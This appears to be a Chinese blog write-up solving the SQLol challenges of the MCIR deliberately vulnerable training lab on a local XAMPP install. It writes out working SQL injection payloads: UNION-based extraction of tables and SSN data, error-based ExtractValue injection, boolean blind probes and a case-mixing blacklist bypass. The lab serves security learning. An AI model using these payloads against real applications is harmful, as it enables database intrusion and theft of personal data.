环境: xampp-win32-5.6.3-0-VC11 mcir
前言
mcir也是十大之一,但是怎么感觉没人写点关于它的博文等信息呢?这样对于一个新手来学习这个系统真的顿感吃力,很难很难....我计划是两天学习整理资料。但是都一天过去了,我还在抓瞎,用去的时间,跟实际所做的事,感觉整个人都不好了,啊,鸭梨好大!!!
最后搜到youtube上的视频,稍微看了下,猜有些感觉,视频地址: Riding the Magical Code Injection Rainbow (MCIR) with Daniel Crowley
严归
郑赚
准备
首先在程序中更改数据库链接密码(如果用的是集成环境xampp,那么将密码设置为空就好),在文件
D:\xampp\htdocs\mcir\sqlol\includes\database.config.php
开始
在进入主页后,选择SQLol进入,看到这个
| INSERT || UPDATE || DELETE || SELECT || Custom || Challenges |
选择Challenges,进入后会看到如下图片:
我们照他的挑战等级,一个一个挑战。
Challenge 0
这个很简单,要求得到所有用户名信息:
Your objective is to get the query to return all usernames instead of just one.
提示给出是字符型,那么直接用如下语句并得到其结果:
当然除了 ' or '1'='1 ,我们也能用官方视频提供的 '=' 注入方法
Challenge 1
在挑战一中,要求如下:
Your objective is to find the table of social security numbers present in the database and extract its information.
需要找表了,这个我的做法如下:
order by 猜到结果集的字段长度: 1
然后得到用户连接,数据库版本。语句如下:
' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version()) #
结果是: root@localhost : sqlol : 5.6.21
然后我们猜sqlol下的表:
' and 1=2 union select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x73716C6F6C #
得到两张表: ssn 、 users
要我们得到 social security numbers ,再看着两张表,我们知道应该就是ssn表了,好吧,开始得到ssn表下的所有字段
' and 1=2 union select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x73736E #
得到两个字段: name 、 ssn
然后就爆出字段下的值
' and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #
得到的信息如下图:
Challenge 2 - The Failure of Quote Filters
在挑战二中,咋一看要求跟上面的一模一样呢。直接把上面最后的语句复制过去。咦,报错了,在仔细看了看挑战的描述:
Many people sanitize or remove single quotes in their Web applications to prevent SQL injection attacks. While this can be effective against injection into string parameters, it is ineffective at preventing injection into parameters which are not quote delimited, like integers or datetime values. This places restrictions on how your injection string can be written, but does not present much of an obstacle to an attacker.
老老实实硬着头皮看了看,发现web应用程序过滤了单引号. 故此我们去掉单引号试试:
and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #
得到结果如下:
Challenge 3 - Death Row
对该挑战的描述如下:
You don't always have the luxury of retrieving all rows of output from a query when performing an SQL injection attack. Sometimes, you only get one row. This challenge is similar to challenge 1, "SQL Injection 101", but only provides one row of output. To make things more challenging, this challenge configuration does not show you the query.
大概意思是要求跟挑战一 一样,但是得到的结果不再是所有行记录,而只是一次只返回一行。
对于这样的类型,我们构造的语句如下:
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 #
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 #
...
Challenge 4 - War on Error
且看描述:
In this challenge, no output from the query is shown, but verbose errors are shown.
Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT blind SQL injection techniques.
这是查询结果不能显示,需要构造语句到错误显示处。(这里一定是要开错误提示的)
构造语句如下:
' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a
' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a
...
Challenge 5 - Blind Luck
且看描述:
You must perform a basic Blind SQL injection attack. Only an indication of whether the query returned results is available.
这是关闭了错误提示,在盲注下进行注入。
对于这种注入,结果会返回boolean型,我们在构造时,要构造成判断型语句???并且一定要用or ???
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 79 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 71 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 67 #
Challenge 6 - Stack the Deck
In this challenge, you must utilize stacked queries due to the difficulty of extraction in the SQLi scenario.
Your objective is to create a new table called "ipwntyourdb" using stacked queries.
挑战六是堆叠查询,但是php冒是不支持啊,请参见这里描述:SQL:php+mysql支持stacked query(堆叠查询)吗?
而且这个挑战好像没实现的感觉 ----
Challenge 7 - Walking on Thin Ice
In this challenge, no output from the query is shown, but verbose errors are shown.
Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.
(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)
....有关delete的注入漏洞,目前不知道怎么到
Challenge 8 - Black Comedy
You must perform a very basic SQL injection attack, but a primitive blacklisting filter is in place.
Your objective is to find the table of social security numbers present in the database and extract its information.
默认的黑名单过滤,但是可以绕过,注入语句如下:
' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='
Challenge 9 - Administrative Tasks
In this challenge, you are working with an UPDATE query. The query updates the field "username" in the "users" table for a given user.
Your objective is to inject into the query and cause it to update the "isadmin" field to 1 for the user with id 3.
未实现-----
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。